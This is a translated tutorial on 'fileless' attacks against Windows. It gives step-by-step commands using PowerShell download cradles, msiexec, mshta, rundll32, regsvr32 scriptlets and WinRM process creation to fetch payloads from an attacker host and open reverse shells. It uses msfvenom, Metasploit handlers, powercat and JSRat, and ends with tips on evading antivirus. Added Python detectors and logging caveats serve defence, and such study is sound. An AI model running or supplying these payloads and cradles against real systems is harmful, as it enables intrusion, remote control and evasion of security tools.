Preface to the article
A so-called "fileless landing attack" (fileless execution) is one in which the attacker never writes the malicious program to the target's disk themselves: the payload is fetched over the network and run directly in memory by a trusted Windows binary that is already present on the system. Because file-based controls (on-access antivirus scanning, hash blocklists, quarantine) never see a payload file, the technique is widely used to evade traditional detection, and it is currently popular. This article briefly introduces several common variants. Note that "fileless" is a convention rather than a guarantee: some of the binaries below still cache what they download in a temporary file, and the launching command line, PowerShell script block logs and the process memory itself remain visible to endpoint telemetry.
Common techniques
powershell
PowerShell is a cross-platform task automation and configuration management framework that consists of a shell and a scripting language. Unlike most shells that accept and return text, PowerShell is built on the .NET Common Language Runtime (CLR). A fundamental change to accepting and returning .NET objects introduces entirely new automation tools and methods.
PowerShell cmdlets are designed to process objects. Objects are structured information, not just the strings that appear on the screen, so command output always carries additional information that you can use when needed. If you have used text-processing tools to handle data before, you will find that they behave differently in PowerShell: in most cases no text processing is needed to extract a specific piece of information, because parts of the data can be accessed directly with standard PowerShell object syntax.
On the one hand, PowerShell's power is a convenience for Windows developers and administrators; on the other, it opens a new path for attackers, which is why security researchers study it. Below is how a fileless attack is carried out through PowerShell. The specific steps are as follows:
Step 1: Use Msfvenom to generate an attack payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1
Step 2: Start listening in msf
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.174.129
set LPORT 4444
set ExitOnSession false
exploit -j -z
Step 3: Use python to start a simple web server on the attack host to serve shell.ps1
python2 -m SimpleHTTPServer 1234
Step 4: Run the following command on the target host. PowerShell downloads the script as a string and passes it straight to Invoke-Expression (IEX), so the payload is executed in memory and never saved to disk; -nop skips the profile, -w hidden hides the console window and -c runs the inline command.
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:1234/shell.ps1'))"
Step 5: The web server logs a GET request for shell.ps1 from the target
Step 6: The handler on the MSF side receives the reverse Meterpreter session
Caveat: on PowerShell 5.0 and later, script block logging (Event ID 4104) records the decoded script that IEX executes, AMSI hands the script text to the installed antivirus before it runs, and process-creation auditing (Event ID 4688 or Sysmon Event ID 1) records the download-cradle command line itself, so "fileless" does not mean "invisible".
msiexec
msiexec.exe is a system process and part of Windows Installer. It installs Windows Installer packages (MSI) and is essential to the normal operation of the system; it usually appears when Microsoft Update installs updates or when software is installed, and it can use a lot of memory while doing so. Because it accepts a URL as the package path, we can also use it as a medium for fileless execution. An example:
Step 1: Use Msfvenom to construct a malicious msi program
msfvenom -p windows/exec CMD="powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.174.129 -p 6666 -e cmd" -f msi > evil.msi
Step 2: Use python to open a simple web server on the attack host to host evil.msi (the same SimpleHTTPServer command as in the PowerShell section)
Step 3: Use nc listening port on the attacking host
nc -lvp 6666
Step 4: Execute the following command on the target host; /q selects quiet mode and /i installs the package, which Windows Installer fetches from the URL.
msiexec /q /i http://192.168.174.129:1234/evil.msi
Step 5: The web server logs the request for evil.msi, and the nc listener receives an interactive cmd session. In practice Windows Installer still downloads the package into a temporary file before running it, so "fileless" here means only that the attacker never copies the payload to the target manually; the msiexec command line with an http:// package path is the durable indicator.
mshta
mshta.exe is a Windows component, the Microsoft HTML Application host, used to run .HTA files (HTML applications whose embedded script runs with full user privileges outside the browser sandbox). We can build the HTA file locally and have the target's mshta download and execute it remotely to achieve fileless execution. The specific steps are as follows:
Step 1: Use msf's exploit/windows/misc/hta_server module, which hosts the HTA and starts the matching handler; once it is running it prints the URL the target must open.
Step 2: Execute the following command directly on the target host to carry out the fileless attack
mshta.exe http://192.168.174.129:8888/OqD8kxY2Z.hta
rundll32
Rundll32.exe, literally "run 32-bit DLL", is a Microsoft-signed binary whose job is to load a dynamic link library and call one of its exported functions from the command line. There is no separate rundll64.exe: on 64-bit Windows the 64-bit binary is %SystemRoot%\System32\rundll32.exe and the 32-bit one is %SystemRoot%\SysWOW64\rundll32.exe. It is a favourite of malware authors and one of the execution vehicles most frequently seen in malware analysis reports. The usage of Rundll32.exe is as follows:
Rundll32.exe DLLname,Functionname Arguments
Parameter Description:
DLLname: the DLL file to load
Functionname: the exported function of that DLL to call
Arguments: the arguments passed to that function
Below we introduce how Rundll32.exe is used in fileless attacks (process hiding is out of scope here; search for it if you are interested). The trick is that rundll32 is pointed at the mshtml DLL by path traversal and told to call its RunHTMLApplication export, which treats the rest of the command line as a javascript: URL, so the JScript runs inside rundll32 and fetches the next stage over HTTP. The specific steps are as follows:
Step 1: Run JSRat to listen on local port 5678
./JSRat.py -i 192.168.174.129 -p 5678
Step 2: Open the "client command" URL that JSRat prints; it shows the one-liner the target must run to connect back
Step 3: Copy that command to the target host and execute it; the version generated for this setup is:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.129:5678/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Step 4: JSRat receives the connection and the shell is bounced back successfully
regsvr32
The Regsvr32 command registers and unregisters COM components (controls) and is run from the command line. On Windows XP and later, regsvr32.exe is in the windows\system32 folder; on Windows 2000 it is in winnt\system32. Its /i switch passes a string to the component's DllInstall routine, and when the component is scrobj.dll (the Windows Script Component runtime) that string can be the URL of an XML scriptlet (.sct), which regsvr32 fetches and executes. The /s, /n and /u switches (silent, skip DllRegisterServer, call the uninstall path) keep it from writing any registration to the registry while the scriptlet still runs. We can use this to implement a fileless attack. As with rundll32, it is done with the help of JSRat:
Step 1: Run JSRat to listen to the local port 5678
./JSRat.py -i 192.168.174.129 -p 5678
Step 2: Open the "client command" URL that JSRat prints; it shows the one-liner the target must run to connect back
Step 3: Copy that command to the target host and execute it; the regsvr32 variant is:
regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll
Step 4: JSRat receives the connection and the shell is bounced back successfully
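The five command lines above (the PowerShell download cradle, msiexec with an http package, mshta with a URL, rundll32 with a javascript: argument, and regsvr32 /i:<url> with scrobj.dll) are the durable artifacts of these techniques: whatever the payload does in memory, the launching process is still recorded by process-creation auditing (Event ID 4688 or Sysmon Event ID 1). The detector below is an added example written for this article, not code from the original post or from any of the tools it uses. It runs over constructed command lines (the page's own five plus three benign invocations of the same binaries); the rule names and regular expressions are this example's own choices.

```python
"""
Added example (not from the original article): a detector for the command
lines of the five techniques above, run over constructed process command lines
of the kind found in Windows 4688 or Sysmon Event ID 1 records.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    image: re.Pattern   # must match the basename of the launched binary
    all_of: tuple       # every pattern must match somewhere in the arguments


def _rule(name, image, *all_of):
    return Rule(name, re.compile(image, re.I),
                tuple(re.compile(p, re.I) for p in all_of))


# Matching is case-insensitive because cmd.exe, PowerShell and Win32 paths are.
RULES = (
    _rule("powershell_download_cradle", r"^(powershell|pwsh)(\.exe)?$",
          r"\b(iex|invoke-expression)\b",
          r"\b(downloadstring|downloadfile|downloaddata|invoke-webrequest|iwr|net\.webclient)\b"),
    _rule("msiexec_remote_package", r"^msiexec(\.exe)?$",
          r"[/-](i|a|package)\s+https?://"),
    _rule("mshta_remote_content", r"^mshta(\.exe)?$",
          r"(https?://|javascript:|vbscript:)"),
    _rule("rundll32_script_protocol", r"^rundll32(\.exe)?$",
          r"\b(javascript|vbscript):"),
    _rule("regsvr32_remote_scriptlet", r"^regsvr32(\.exe)?$",
          r"/i:\s*https?://|scrobj\.dll"),
)


def split_image(cmdline: str):
    """Split a raw command line into (basename of the image, argument string).
    Handles both quoted and unquoted image paths."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            end = len(s)
        image, args = s[1:end], s[end + 1:]
    else:
        image, _, args = s.partition(" ")
    return re.split(r"[\\/]", image)[-1], args.strip()


def classify(cmdline: str) -> list:
    """Names of every rule the command line trips (empty list if none)."""
    image, args = split_image(cmdline)
    return [r.name for r in RULES
            if r.image.match(image) and all(p.search(args) for p in r.all_of)]


def scan(cmdlines):
    """Return [(cmdline, [rule names])] for the lines that match at least one rule."""
    out = []
    for line in cmdlines:
        hits = classify(line)
        if hits:
            out.append((line, hits))
    return out


# Constructed sample: the five command lines used in the article followed by
# three ordinary administrative invocations of the same binaries.
SAMPLE_CMDLINES = [
    'powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.174.129:1234/shell.ps1\'))"',
    'msiexec /q /i http://192.168.174.129:1234/evil.msi',
    'mshta.exe http://192.168.174.129:8888/OqD8kxY2Z.hta',
    r'''rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.129:5678/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}''',
    'regsvr32.exe /u /n /s /i:http://192.168.174.129:5678/file.sct scrobj.dll',
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    r'msiexec.exe /i C:\Users\admin\Downloads\7z2301-x64.msi /qn',
    r'regsvr32.exe /s C:\Windows\System32\jscript.dll',
]


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES):
        print(", ".join(hits), "<-", line[:70])
```

The rules key on the image name plus argument patterns rather than on the full one-liner, so they also catch variants (Invoke-WebRequest instead of DownloadString, a vbscript: protocol in mshta, a local .sct passed to scrobj.dll). The benign lines show the false-positive boundary: the same binaries with local paths and no download or script-protocol argument are left alone.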
Knowledge expansion
Here we introduce a fileless attack method that is commonly used on intranets: a WinRM fileless attack.
WinRM
WinRM is the abbreviation of Windows Remote Management. It is a service that allows administrators to perform system management tasks remotely; communication is SOAP over HTTP (port 5985) or HTTPS (port 5986). Kerberos and NTLM (Negotiate) authentication are enabled by default, while Basic and CredSSP authentication are available but disabled on the service side by default. In intranet penetration it can be used not only for lateral movement but also for fileless execution, which improves the attacker's concealment.
test environment
- Domain host: Windows Server 2012 (192.168.174.2)
- Domain host: Windows Server 2008 R2 (192.168.174.4)
- Attack host: Kali Linux (192.168.174.129; how the attacker reached the intranet is omitted here)
Purpose
Create a backdoor file with the MSF framework on the Kali host and transfer it to the domain host we already control (Windows Server 2008 R2). Then, from the other domain host (Windows Server 2012), use WinRM to run that file directly from the 2008 R2 share, so the backdoor executes on Server 2012 without ever being written to its disk, and a new, better-hidden Windows Server 2012 shell is returned to our attack host for further exploitation of the intranet.
Attack steps
Step 1: Create the backdoor file through msfvenom in the attack host
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f exe >shell.exe
Step 2: Start the MSF framework and set up the handler (the same multi/handler settings as in the PowerShell section)
Step 3: Transfer shell.exe to the C drive of Windows Server 2008 R2
Step 4: Enable WinRM on Windows Server 2012 (this starts the service and creates a listener)
winrm quickconfig
Step 5: From Windows Server 2012, authenticate to Windows Server 2008 R2 over IPC$ so that the UNC path can be reached
net use \\192.168.174.4\ipc$ "test@1233" /user:testuser
Step 6: On Windows Server 2008 R2, share the C drive as "c" and grant the account read permission, so that \\192.168.174.4\c\shell.exe resolves
Step 7: Execute the following command on Windows Server 2012. It calls the Create method of the Win32_Process WMI class through the local WinRM service with the UNC path as the command line, so shell.exe runs on Server 2012 straight from the remote share and never touches its disk (with -r:<host> the same command would start the payload on another WinRM-enabled host).
winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.174.4\c\shell.exe"}
Step 8: The shell is bounced back to MSF successfully
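On the executing host, the WinRM step above leaves a distinctive process chain: Win32_Process.Create spawns the payload under the WMI provider host WmiPrvSE.exe, and the image path of the new process is the UNC path on the 2008 R2 share rather than a local file. The correlation below is an added example written for this article, not code from the original post. The event records are constructed in Sysmon's field names (Event ID 1 for process creation, Event ID 3 for network connections) and are not real logs from the lab; the 60-second window and the severity labels are this example's own assumptions.

```python
"""
Added example (not from the original article): correlating endpoint telemetry
on the host that runs the payload. `winrm invoke create wmicimv2/win32_process`
calls Win32_Process.Create through WMI, so the payload is spawned by
WmiPrvSE.exe and its image path is the UNC path on the share. Events below are
constructed Sysmon-style records, not real telemetry.
"""
import re

UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")   # host part of \\host\share\file

# Constructed sample telemetry for the article's scenario on 192.168.174.2: an
# SMB connection to the share host, then shell.exe started from that share
# under WmiPrvSE.exe. The later explorer.exe launch from a share is an ordinary
# user action, included to show the severity split.
EVENTS = [
    {"t": 100, "id": 3, "Image": "System",
     "DestinationIp": "192.168.174.4", "DestinationPort": 445},
    {"t": 101, "id": 1, "Image": r"\\192.168.174.4\c\shell.exe",
     "CommandLine": r"\\192.168.174.4\c\shell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"t": 140, "id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"t": 900, "id": 1, "Image": r"\\fileserver\tools\procexp.exe",
     "CommandLine": r"\\fileserver\tools\procexp.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def share_host(path):
    """Host component of a UNC path, lower-cased, or None for a local path."""
    m = UNC_HOST.match(path or "")
    return m.group(1).lower() if m else None


def find_unc_executions(events, window=60):
    """One finding per process whose image lives on a UNC path.

    severity is "high" when the parent is WmiPrvSE.exe (the signature of a
    Win32_Process.Create issued over WinRM or WMI) and "low" for a launch from
    a share by an interactive process. smb_connect_seen is True when a network
    connect to port 445 on the share host was logged within `window` seconds
    before the process start, tying the execution to the remote share.
    """
    events = sorted(events, key=lambda e: e["t"])
    findings = []
    for ev in events:
        if ev["id"] != 1:
            continue
        host = share_host(ev.get("Image")) or share_host(ev.get("CommandLine"))
        if host is None:
            continue
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        smb_seen = any(
            n["id"] == 3 and n.get("DestinationPort") == 445
            and ev["t"] - window <= n["t"] <= ev["t"]
            and host in (str(n.get("DestinationIp", "")).lower(),
                         str(n.get("DestinationHostname", "")).lower())
            for n in events)
        findings.append({
            "t": ev["t"], "image": ev["Image"], "parent": parent,
            "share_host": host, "smb_connect_seen": smb_seen,
            "severity": "high" if parent == "wmiprvse.exe" else "low",
        })
    return findings


if __name__ == "__main__":
    for f in find_unc_executions(EVENTS):
        print(f"[{f['severity']}] t={f['t']} {f['image']} parent={f['parent']} "
              f"smb_connect_seen={f['smb_connect_seen']}")
```

Two further places to look in a real investigation: on the file server, share-access auditing (Event ID 5140) records the read of shell.exe by the account used in the net use step, and on the calling side winrm is a batch wrapper (winrm.cmd) that runs cscript.exe with winrm.vbs, so the `invoke create` arguments appear in the cscript.exe command line rather than under a winrm.exe image.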
Summary at the end of the article
There are many more fileless execution methods and techniques than those above. To further improve concealment and evade antivirus, you can combine whitelisting bypasses with the features of other Windows system binaries, for example using MpCmdRun.exe, the command-line tool that ships with Windows Defender, to download a payload remotely (it does write the download to disk, but from a trusted, signed process) and execute it so that a Cobalt Strike (CS) beacon checks in. Further methods and techniques are still being explored...